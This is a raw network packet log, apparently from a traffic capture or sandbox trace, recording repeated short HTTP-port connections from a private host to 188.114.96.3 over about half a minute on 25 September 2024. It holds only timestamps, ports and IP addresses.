Sep 25, 2024 15:29:31.892834902 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.899652958 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.906691074 CEST	80	55935	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:31.906769991 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:31.911701918 CEST	80	55935	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.623945951 CEST	80	55935	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.624051094 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.624977112 CEST	80	55935	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.625014067 CEST	55935	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.628953934 CEST	80	55935	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.783730984 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.789900064 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.790004969 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.792078972 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.797863007 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:32.797954082 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:32.802978992 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.508528948 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.508697033 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.510838985 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.510885954 CEST	55936	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.513536930 CEST	80	55936	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.651272058 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.656261921 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.656362057 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.658562899 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.663680077 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:33.663752079 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:33.668576956 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.368746996 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.368849039 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.368968010 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.369008064 CEST	55937	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.373954058 CEST	80	55937	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.507328033 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.512249947 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.512365103 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.514517069 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.519718885 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:34.519787073 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:34.524560928 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.193804026 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.193902969 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.193986893 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.194082975 CEST	55938	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.198669910 CEST	80	55938	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.338762999 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.345367908 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.345488071 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.347440004 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.353374958 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:35.353458881 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:35.359232903 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.042773962 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.042891026 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.044084072 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.044131994 CEST	55939	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.047854900 CEST	80	55939	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.180238008 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.185200930 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.185319901 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.187341928 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.192259073 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.192349911 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.197191000 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.930238008 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.930413961 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.930635929 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:36.930712938 CEST	55940	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:36.935468912 CEST	80	55940	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.104393959 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.110629082 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.110716105 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.112823009 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.117765903 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.117851973 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.122632980 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.927221060 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.927517891 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.928500891 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:37.929507971 CEST	55941	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:37.932327986 CEST	80	55941	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.085711956 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.090723038 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.091711044 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.093724966 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.099848032 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.099927902 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.105036020 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.890101910 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.890389919 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.890539885 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:38.890602112 CEST	55942	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:38.895251036 CEST	80	55942	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.046932936 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.052088976 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.052176952 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.054641008 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.059679985 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.059740067 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.064547062 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.760343075 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.761117935 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.761199951 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.767534018 CEST	55943	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.772495985 CEST	80	55943	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.914601088 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.921063900 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.921181917 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.923233032 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.928728104 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:39.928783894 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:39.933774948 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.653837919 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.653978109 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.654933929 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.654988050 CEST	55944	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.659575939 CEST	80	55944	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.795840025 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.800787926 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.800901890 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.803019047 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.808089018 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:40.808146954 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:40.812988997 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.471640110 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.471798897 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.471815109 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.471862078 CEST	55945	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.476685047 CEST	80	55945	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.625467062 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.630584955 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.630681038 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.633367062 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.638175011 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:41.638242960 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:41.643100977 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.305742025 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.305949926 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.306814909 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.306864023 CEST	55946	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.310743093 CEST	80	55946	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.462697029 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.467762947 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.467866898 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.470592976 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.475404978 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:42.475610971 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:42.480464935 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.162539959 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.162637949 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.163499117 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.163547993 CEST	55947	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.167479038 CEST	80	55947	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.312001944 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.317142963 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.317233086 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.320044994 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.324860096 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:43.324953079 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:43.329879999 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.096743107 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.097009897 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.097543955 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.097624063 CEST	55948	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.101969004 CEST	80	55948	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.251260996 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.256354094 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.256485939 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.258714914 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.263523102 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:44.263622046 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:44.268486023 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.056214094 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.056343079 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.057349920 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.057395935 CEST	55949	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.061184883 CEST	80	55949	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.196466923 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.367119074 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.367235899 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.369345903 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.374125004 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:45.374185085 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:45.378964901 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.147882938 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.147974968 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.148418903 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.148457050 CEST	55950	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.152919054 CEST	80	55950	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.294290066 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.299235106 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.299324036 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.301419020 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.306281090 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:46.306365013 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:46.311172962 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.186216116 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.186446905 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.186606884 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.186664104 CEST	55951	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.191360950 CEST	80	55951	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.347495079 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.353176117 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.353260040 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.355966091 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.360757113 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:47.360806942 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:47.366703987 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.239687920 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.240063906 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.240637064 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.240708113 CEST	55952	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.244918108 CEST	80	55952	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.402642965 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.407618999 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.407773972 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.409802914 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.414733887 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:48.414802074 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:48.419686079 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.512233019 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.512820005 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.512909889 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.514672041 CEST	55953	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.520363092 CEST	80	55953	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.665340900 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.670264006 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.670411110 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.672507048 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.677318096 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:49.677411079 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:49.682168007 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.344510078 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.344615936 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.344908953 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.344949007 CEST	55954	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.349452972 CEST	80	55954	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.511046886 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.516055107 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.516130924 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.519201994 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.524121046 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:50.524173975 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:50.529016972 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.275609016 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.275783062 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.276854992 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.276935101 CEST	55955	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.280706882 CEST	80	55955	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.416181087 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.421195030 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.421293974 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.423162937 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.428138971 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:51.428231955 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:51.433537006 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.197736025 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.197835922 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.198797941 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.198848009 CEST	55956	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.202676058 CEST	80	55956	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.529314995 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.534239054 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.534328938 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.536717892 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.541551113 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:52.541642904 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:52.548624992 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.229687929 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.229813099 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.230206013 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.230273008 CEST	55957	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.234693050 CEST	80	55957	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.370002985 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.375433922 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.375535965 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.377525091 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.383038998 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:53.383135080 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:53.388670921 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.101306915 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.101488113 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.102031946 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.102094889 CEST	55958	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.106348038 CEST	80	55958	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.245740891 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.250874996 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.250950098 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.253329039 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.258167028 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.258505106 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.263367891 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.970730066 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.972057104 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:54.972069025 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.972112894 CEST	55959	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:54.976955891 CEST	80	55959	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:55.407907009 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:55.415240049 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:55.415309906 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:55.418677092 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:55.425712109 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:55.425796032 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:55.432951927 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.064028978 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.064141035 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.064490080 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.064560890 CEST	55960	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.069026947 CEST	80	55960	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.212359905 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.217426062 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.217494965 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.219639063 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.224555016 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.224618912 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.229465961 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.901269913 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.901469946 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.901814938 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:56.901870012 CEST	55961	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:56.906316042 CEST	80	55961	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.040164948 CEST	55962	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:57.045118093 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.045285940 CEST	55962	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:57.047328949 CEST	55962	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:57.052107096 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.052272081 CEST	55962	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:57.057117939 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.735141993 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.735296965 CEST	55962	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:57.736435890 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:57.736490965 CEST	55962	80	192.168.2.4	188.114.96.3
